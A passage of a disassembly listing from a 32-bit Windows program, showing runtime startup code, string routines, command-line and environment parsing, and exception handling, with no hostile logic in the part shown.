mov [edi], edx
add edi, 4
loc_4027B6: ; CODE XREF: sub_402730+6B�j
; sub_402730+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4027B1
test dl, dl
jz short loc_402808
test dh, dh
jz short loc_4027FF
test edx, 0FF0000h
jz short loc_4027F2
test edx, 0FF000000h
jz short loc_4027EA
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027EA: ; CODE XREF: sub_402730+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027F2: ; CODE XREF: sub_402730+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027FF: ; CODE XREF: sub_402730+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402808: ; CODE XREF: sub_402730+72�j
; sub_402730+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402730 endp
; =============== S U B R O U T I N E =======================================
sub_402810 proc near ; CODE XREF: sub_401E30+19�p
arg_0 = dword ptr 4
cmp dword_406CEC, 1
jle short loc_40282A
push 107h
push [esp+4+arg_0]
call sub_402A4C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40282A: ; CODE XREF: sub_402810+7�j
mov eax, [esp+arg_0]
mov ecx, off_406AE0
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402810 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405128
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_4050AC ; GetVersion
xor edx, edx
mov dl, ah
mov dword_406F64, edx
mov ecx, eax
and ecx, 0FFh
mov dword_406F60, ecx
shl ecx, 8
add ecx, edx
mov dword_406F5C, ecx
shr eax, 10h
mov dword_406F58, eax
xor esi, esi
push esi
call sub_403382
pop ecx
test eax, eax
jnz short loc_4028AA
push 1Ch
call sub_402959
pop ecx
loc_4028AA: ; CODE XREF: .text:004028A0�j
mov [ebp-4], esi
call sub_4031D7
call dword_4050A8 ; GetCommandLineA
mov dword_407458, eax
call sub_4030A5
mov dword_406F40, eax
call sub_402E58
call sub_402D9F
call sub_402AC1
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_4050A4 ; GetStartupInfoA
call sub_402D47
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_4028F7
movzx eax, word ptr [ebp-2Ch]
jmp short loc_4028FA
; ---------------------------------------------------------------------------
loc_4028F7: ; CODE XREF: .text:004028EF�j
push 0Ah
pop eax
loc_4028FA: ; CODE XREF: .text:004028F5�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_4050A0 ; GetModuleHandleA
push eax
call sub_402029
mov [ebp-60h], eax
push eax
call sub_402AEE
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_402BC3
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402AFF
; =============== S U B R O U T I N E =======================================
sub_402934 proc near ; CODE XREF: sub_402D9F+4E�p
; sub_402D9F+7D�p ...
arg_0 = dword ptr 4
cmp dword_406F48, 1
jnz short loc_402942
call sub_403590
loc_402942: ; CODE XREF: sub_402934+7�j
push [esp+arg_0]
call sub_4035C9
push 0FFh
call off_406AD0
pop ecx
pop ecx
retn
sub_402934 endp
; =============== S U B R O U T I N E =======================================
sub_402959 proc near ; CODE XREF: .text:004028A4�p
arg_0 = dword ptr 4
cmp dword_406F48, 1
jnz short loc_402967
call sub_403590
loc_402967: ; CODE XREF: sub_402959+7�j
push [esp+arg_0]
call sub_4035C9
pop ecx
push 0FFh
call dword_4050B0 ; ExitProcess
retn
sub_402959 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402996
loc_402980: ; CODE XREF: sub_402996+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402996
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402996 proc near ; CODE XREF: sub_402600+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402980 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4029BB
loc_4029A8: ; CODE XREF: sub_402996+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402980
test cl, cl
jz short loc_402A04
test edx, 3
jnz short loc_4029A8
loc_4029BB: ; CODE XREF: sub_402996+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4029C6: ; CODE XREF: sub_402996+5B�j
; sub_402996+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402A08
and eax, 81010100h
jz short loc_4029C6
and eax, 1010100h
jnz short loc_402A02
and esi, 80000000h
jnz short loc_4029C6
loc_402A02: ; CODE XREF: sub_402996+62�j
; sub_402996+7B�j ...
pop esi
pop edi
loc_402A04: ; CODE XREF: sub_402996+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402A08: ; CODE XREF: sub_402996+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402A45
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A3E
test ah, ah
jz short loc_402A02
shr eax, 10h
cmp al, bl
jz short loc_402A37
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A30
test ah, ah
jz short loc_402A02
jmp short loc_4029C6
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_402996+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A37: ; CODE XREF: sub_402996+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A3E: ; CODE XREF: sub_402996+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A45: ; CODE XREF: sub_402996+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402996 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A4C proc near ; CODE XREF: sub_402810+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402A6A
mov ecx, off_406AE0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402ABC
; ---------------------------------------------------------------------------
loc_402A6A: ; CODE XREF: sub_402A4C+10�j
mov ecx, eax
push esi
mov esi, off_406AE0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402A8F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402A98
; ---------------------------------------------------------------------------
loc_402A8F: ; CODE XREF: sub_402A4C+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402A98: ; CODE XREF: sub_402A4C+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_40371C
add esp, 1Ch
test eax, eax
jnz short loc_402AB8
leave
retn
; ---------------------------------------------------------------------------
loc_402AB8: ; CODE XREF: sub_402A4C+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402ABC: ; CODE XREF: sub_402A4C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402A4C endp
; =============== S U B R O U T I N E =======================================
sub_402AC1 proc near ; CODE XREF: .text:004028D1�p
mov eax, dword_407454
test eax, eax
jz short loc_402ACC
call eax ; dword_407454
loc_402ACC: ; CODE XREF: sub_402AC1+7�j
push offset dword_406010
push offset dword_406008
call sub_402BA9
push offset dword_406004
push offset dword_406000
call sub_402BA9
add esp, 10h
retn
sub_402AC1 endp
; =============== S U B R O U T I N E =======================================
sub_402AEE proc near ; CODE XREF: .text:00402910�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402B10
add esp, 0Ch
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
sub_402AFF proc near ; CODE XREF: .text:0040292F�p
; sub_402934+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402B10
add esp, 0Ch
retn
sub_402AFF endp
; =============== S U B R O U T I N E =======================================
sub_402B10 proc near ; CODE XREF: sub_402AEE+8�p
; sub_402AFF+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_406F94, edi
jnz short loc_402B2D
push [esp+4+arg_0]
call dword_4050B8 ; GetCurrentProcess
push eax
call dword_4050B4 ; TerminateProcess
loc_402B2D: ; CODE XREF: sub_402B10+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_406F90, edi
mov byte_406F8C, bl
jnz short loc_402B81
mov eax, dword_407450
test eax, eax
jz short loc_402B70
mov ecx, dword_40744C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402B6F
loc_402B5C: ; CODE XREF: sub_402B10+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402B64
call eax
loc_402B64: ; CODE XREF: sub_402B10+50�j
sub esi, 4
cmp esi, dword_407450
jnb short loc_402B5C
loc_402B6F: ; CODE XREF: sub_402B10+4A�j
pop esi
loc_402B70: ; CODE XREF: sub_402B10+3C�j
push offset dword_406018
push offset dword_406014
call sub_402BA9
pop ecx
pop ecx
loc_402B81: ; CODE XREF: sub_402B10+33�j
push offset dword_406020
push offset dword_40601C
call sub_402BA9
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402BA7
push [esp+4+arg_0]
mov dword_406F94, edi
call dword_4050B0 ; ExitProcess
loc_402BA7: ; CODE XREF: sub_402B10+85�j
pop edi
retn
sub_402B10 endp
; =============== S U B R O U T I N E =======================================
sub_402BA9 proc near ; CODE XREF: sub_402AC1+15�p
; sub_402AC1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402BAE: ; CODE XREF: sub_402BA9+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402BC1
mov eax, [esi]
test eax, eax
jz short loc_402BBC
call eax
loc_402BBC: ; CODE XREF: sub_402BA9+F�j
add esi, 4
jmp short loc_402BAE
; ---------------------------------------------------------------------------
loc_402BC1: ; CODE XREF: sub_402BA9+9�j
pop esi
retn
sub_402BA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BC3 proc near ; CODE XREF: .text:00402921�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402D04
test eax, eax
pop ecx
jz loc_402CF8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402CF8
cmp ebx, 5
jnz short loc_402BF4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402D01
; ---------------------------------------------------------------------------
loc_402BF4: ; CODE XREF: sub_402BC3+23�j
cmp ebx, 1
jz loc_402CF3
mov ecx, dword_406F98
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_406F98, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402CE3
mov ecx, dword_406D70
mov edx, dword_406D74
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402C43
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406D00h[esi*4]
loc_402C3A: ; CODE XREF: sub_402BC3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402C3A
loc_402C43: ; CODE XREF: sub_402BC3+69�j
mov eax, [eax]
mov esi, dword_406D7C
cmp eax, 0C000008Eh
jnz short loc_402C5E
mov dword_406D7C, 83h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C5E: ; CODE XREF: sub_402BC3+8D�j
cmp eax, 0C0000090h
jnz short loc_402C71
mov dword_406D7C, 81h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C71: ; CODE XREF: sub_402BC3+A0�j
cmp eax, 0C0000091h
jnz short loc_402C84
mov dword_406D7C, 84h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C84: ; CODE XREF: sub_402BC3+B3�j
cmp eax, 0C0000093h
jnz short loc_402C97
mov dword_406D7C, 85h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C97: ; CODE XREF: sub_402BC3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402CAA
mov dword_406D7C, 82h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CAA: ; CODE XREF: sub_402BC3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402CBD
mov dword_406D7C, 86h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CBD: ; CODE XREF: sub_402BC3+EC�j
cmp eax, 0C0000092h
jnz short loc_402CCE
mov dword_406D7C, 8Ah
loc_402CCE: ; CODE XREF: sub_402BC3+99�j
; sub_402BC3+AC�j ...
push dword_406D7C
push 8
call ebx ; _lread
pop ecx
mov dword_406D7C, esi
pop ecx
pop esi
jmp short loc_402CEB
; ---------------------------------------------------------------------------
loc_402CE3: ; CODE XREF: sub_402BC3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; _lread
pop ecx
loc_402CEB: ; CODE XREF: sub_402BC3+11E�j
mov eax, [ebp+arg_0]
mov dword_406F98, eax
loc_402CF3: ; CODE XREF: sub_402BC3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402D01
; ---------------------------------------------------------------------------
loc_402CF8: ; CODE XREF: sub_402BC3+F�j
; sub_402BC3+1A�j
push [ebp+arg_4]
call dword_4050BC ; UnhandledExceptionFilter
loc_402D01: ; CODE XREF: sub_402BC3+2C�j
; sub_402BC3+133�j
pop ebx
pop ebp
retn
sub_402BC3 endp
; =============== S U B R O U T I N E =======================================
sub_402D04 proc near ; CODE XREF: sub_402BC3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_406D78
cmp dword_406CF8, edx
push esi
mov eax, offset dword_406CF8
jz short loc_402D31
lea esi, [ecx+ecx*2]
lea esi, ds:406CF8h[esi*4]
loc_402D26: ; CODE XREF: sub_402D04+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402D31
cmp [eax], edx
jnz short loc_402D26
loc_402D31: ; CODE XREF: sub_402D04+16�j
; sub_402D04+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406CF8h[ecx*4]
cmp eax, ecx
jnb short loc_402D44
cmp [eax], edx
jz short locret_402D46
loc_402D44: ; CODE XREF: sub_402D04+3A�j
xor eax, eax
locret_402D46: ; CODE XREF: sub_402D04+3E�j
retn
sub_402D04 endp
; =============== S U B R O U T I N E =======================================
sub_402D47 proc near ; CODE XREF: .text:004028E3�p
cmp dword_407448, 0
jnz short loc_402D55
call sub_403C6B
loc_402D55: ; CODE XREF: sub_402D47+7�j
push esi
mov esi, dword_407458
mov al, [esi]
cmp al, 22h
jnz short loc_402D87
loc_402D62: ; CODE XREF: sub_402D47+33�j
; sub_402D47+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402D7F
test al, al
jz short loc_402D7F
movzx eax, al
push eax
call sub_403865
test eax, eax
pop ecx
jz short loc_402D62
inc esi
jmp short loc_402D62
; ---------------------------------------------------------------------------
loc_402D7F: ; CODE XREF: sub_402D47+21�j
; sub_402D47+25�j
cmp byte ptr [esi], 22h
jnz short loc_402D91
loc_402D84: ; CODE XREF: sub_402D47+52�j
inc esi
jmp short loc_402D91
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402D47+19�j
cmp al, 20h
jbe short loc_402D91
loc_402D8B: ; CODE XREF: sub_402D47+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402D8B
loc_402D91: ; CODE XREF: sub_402D47+3B�j
; sub_402D47+3E�j ...
mov al, [esi]
test al, al
jz short loc_402D9B
cmp al, 20h
jbe short loc_402D84
loc_402D9B: ; CODE XREF: sub_402D47+4E�j
mov eax, esi
pop esi
retn
sub_402D47 endp
; =============== S U B R O U T I N E =======================================
sub_402D9F proc near ; CODE XREF: .text:004028CC�p
push ebx
xor ebx, ebx
cmp dword_407448, ebx
push esi
push edi
jnz short loc_402DB1
call sub_403C6B
loc_402DB1: ; CODE XREF: sub_402D9F+B�j
mov esi, dword_406F40
xor edi, edi
loc_402DB9: ; CODE XREF: sub_402D9F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402DD1
cmp al, 3Dh
jz short loc_402DC4
inc edi
loc_402DC4: ; CODE XREF: sub_402D9F+22�j
push esi
call sub_402210
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402DB9
; ---------------------------------------------------------------------------
loc_402DD1: ; CODE XREF: sub_402D9F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_406F74, esi
jnz short loc_402DF3
push 9
call sub_402934
pop ecx
loc_402DF3: ; CODE XREF: sub_402D9F+4A�j
mov edi, dword_406F40
cmp [edi], bl
jz short loc_402E36
push ebp
loc_402DFE: ; CODE XREF: sub_402D9F+94�j
push edi
call sub_402210
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402E2F
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402E22
push 9
call sub_402934
pop ecx
loc_402E22: ; CODE XREF: sub_402D9F+79�j
push edi
push dword ptr [esi]
call sub_402720
pop ecx
add esi, 4
pop ecx
loc_402E2F: ; CODE XREF: sub_402D9F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402DFE
pop ebp
loc_402E36: ; CODE XREF: sub_402D9F+5C�j
push dword_406F40
call sub_403C87
pop ecx
mov dword_406F40, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_407444, 1
pop ebx
retn
sub_402D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E58 proc near ; CODE XREF: .text:004028C7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_407448, ebx
push esi
push edi
jnz short loc_402E6F
call sub_403C6B
loc_402E6F: ; CODE XREF: sub_402E58+10�j
mov esi, offset dword_406F9C
push 104h
push esi
push ebx
call dword_405034 ; GetModuleFileNameA
mov eax, dword_407458
mov dword_406F84, esi
mov edi, esi
cmp [eax], bl
jz short loc_402E94
mov edi, eax
loc_402E94: ; CODE XREF: sub_402E58+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402EF1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403CB6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402EC4
push 8
call sub_402934
pop ecx
loc_402EC4: ; CODE XREF: sub_402E58+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402EF1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_406F6C, esi
pop edi
pop esi
mov dword_406F68, eax
pop ebx
leave
retn
sub_402E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EF1 proc near ; CODE XREF: sub_402E58+47�p
; sub_402E58+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_402F1B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402F1B: ; CODE XREF: sub_402EF1+20�j
cmp byte ptr [eax], 22h
jnz short loc_402F64
loc_402F20: ; CODE XREF: sub_402EF1+58�j
; sub_402EF1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_402F52
test dl, dl
jz short loc_402F52
movzx edx, dl
test byte_407221[edx], 4
jz short loc_402F45
inc dword ptr [ecx]
test esi, esi
jz short loc_402F45
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_402F45: ; CODE XREF: sub_402EF1+46�j
; sub_402EF1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F20
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_402F20
; ---------------------------------------------------------------------------
loc_402F52: ; CODE XREF: sub_402EF1+36�j
; sub_402EF1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F5C
and byte ptr [esi], 0
inc esi
loc_402F5C: ; CODE XREF: sub_402EF1+65�j
cmp byte ptr [eax], 22h
jnz short loc_402FA7
inc eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F64: ; CODE XREF: sub_402EF1+2D�j
; sub_402EF1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F6F
mov dl, [eax]
mov [esi], dl
inc esi
loc_402F6F: ; CODE XREF: sub_402EF1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_407221[ebx], 4
jz short loc_402F8A
inc dword ptr [ecx]
test esi, esi
jz short loc_402F89
mov bl, [eax]
mov [esi], bl
inc esi
loc_402F89: ; CODE XREF: sub_402EF1+91�j
inc eax
loc_402F8A: ; CODE XREF: sub_402EF1+8B�j
cmp dl, 20h
jz short loc_402F98
test dl, dl
jz short loc_402F9C
cmp dl, 9
jnz short loc_402F64
loc_402F98: ; CODE XREF: sub_402EF1+9C�j
test dl, dl
jnz short loc_402F9F
loc_402F9C: ; CODE XREF: sub_402EF1+A0�j
dec eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F9F: ; CODE XREF: sub_402EF1+A9�j
test esi, esi
jz short loc_402FA7
and byte ptr [esi-1], 0
loc_402FA7: ; CODE XREF: sub_402EF1+6E�j
; sub_402EF1+71�j ...
and [ebp+arg_10], 0
loc_402FAB: ; CODE XREF: sub_402EF1+19E�j
cmp byte ptr [eax], 0
jz loc_403094
loc_402FB4: ; CODE XREF: sub_402EF1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_402FC0
cmp dl, 9
jnz short loc_402FC3
loc_402FC0: ; CODE XREF: sub_402EF1+C8�j
inc eax
jmp short loc_402FB4
; ---------------------------------------------------------------------------
loc_402FC3: ; CODE XREF: sub_402EF1+CD�j
cmp byte ptr [eax], 0
jz loc_403094
test edi, edi
jz short loc_402FD8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402FD8: ; CODE XREF: sub_402EF1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_402FDD: ; CODE XREF: sub_402EF1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_402FE6: ; CODE XREF: sub_402EF1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_402FEF
inc eax
inc ebx
jmp short loc_402FE6
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402EF1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403020
test bl, 1
jnz short loc_40301E
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_40300D
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_40300D
mov eax, edx
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_40300D: ; CODE XREF: sub_402EF1+10D�j
; sub_402EF1+116�j
mov [ebp+arg_0], edi
loc_403010: ; CODE XREF: sub_402EF1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40301E: ; CODE XREF: sub_402EF1+106�j
shr ebx, 1
loc_403020: ; CODE XREF: sub_402EF1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403035
inc ebx
loc_403028: ; CODE XREF: sub_402EF1+142�j
test esi, esi
jz short loc_403030
mov byte ptr [esi], 5Ch
inc esi
loc_403030: ; CODE XREF: sub_402EF1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403028
loc_403035: ; CODE XREF: sub_402EF1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403085
cmp [ebp+arg_10], 0
jnz short loc_40304B
cmp dl, 20h
jz short loc_403085
cmp dl, 9
jz short loc_403085
loc_40304B: ; CODE XREF: sub_402EF1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40307F
test esi, esi
jz short loc_40306E
movzx ebx, dl
test byte_407221[ebx], 4
jz short loc_403067
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403067: ; CODE XREF: sub_402EF1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40307D
; ---------------------------------------------------------------------------
loc_40306E: ; CODE XREF: sub_402EF1+162�j
movzx edx, dl
test byte_407221[edx], 4
jz short loc_40307D
inc eax
inc dword ptr [ecx]
loc_40307D: ; CODE XREF: sub_402EF1+17B�j
; sub_402EF1+187�j
inc dword ptr [ecx]
loc_40307F: ; CODE XREF: sub_402EF1+15E�j
inc eax
jmp loc_402FDD
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_402EF1+148�j
; sub_402EF1+153�j ...
test esi, esi
jz short loc_40308D
and byte ptr [esi], 0
inc esi
loc_40308D: ; CODE XREF: sub_402EF1+196�j
inc dword ptr [ecx]
jmp loc_402FAB
; ---------------------------------------------------------------------------
loc_403094: ; CODE XREF: sub_402EF1+BD�j
; sub_402EF1+D5�j
test edi, edi
jz short loc_40309B
and dword ptr [edi], 0
loc_40309B: ; CODE XREF: sub_402EF1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402EF1 endp
; =============== S U B R O U T I N E =======================================
sub_4030A5 proc near ; CODE XREF: .text:004028BD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_4070A0
push ebx
push ebp
mov ebp, dword_4050D0
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4030F3
call ebp ; dword_4050D0
mov esi, eax
cmp esi, ebx
jz short loc_4030D4
mov dword_4070A0, 1
jmp short loc_4030FC
; ---------------------------------------------------------------------------
loc_4030D4: ; CODE XREF: sub_4030A5+21�j
call dword_4050CC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_4031CE
mov dword_4070A0, 2
jmp loc_403182
; ---------------------------------------------------------------------------
loc_4030F3: ; CODE XREF: sub_4030A5+19�j
cmp eax, 1
jnz loc_40317D
loc_4030FC: ; CODE XREF: sub_4030A5+2D�j
cmp esi, ebx
jnz short loc_40310C
call ebp ; dword_4050D0
mov esi, eax
cmp esi, ebx
jz loc_4031CE
loc_40310C: ; CODE XREF: sub_4030A5+59�j
cmp [esi], bx
mov eax, esi
jz short loc_403121
loc_403113: ; CODE XREF: sub_4030A5+73�j
; sub_4030A5+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
loc_403121: ; CODE XREF: sub_4030A5+6C�j
sub eax, esi
mov edi, dword_4050C8
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; dword_4050C8
mov ebp, eax
cmp ebp, ebx
jz short loc_403172
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403172
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; dword_4050C8
test eax, eax
jnz short loc_40316E
push [esp+18h+var_8]
call sub_403C87
pop ecx
mov [esp+18h+var_8], ebx
loc_40316E: ; CODE XREF: sub_4030A5+B9�j
mov ebx, [esp+18h+var_8]
loc_403172: ; CODE XREF: sub_4030A5+99�j
; sub_4030A5+A8�j
push esi
call dword_4050C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_40317D: ; CODE XREF: sub_4030A5+51�j
cmp eax, 2
jnz short loc_4031CE
loc_403182: ; CODE XREF: sub_4030A5+49�j
cmp edi, ebx
jnz short loc_403192
call dword_4050CC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_4031CE
loc_403192: ; CODE XREF: sub_4030A5+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_4031A2
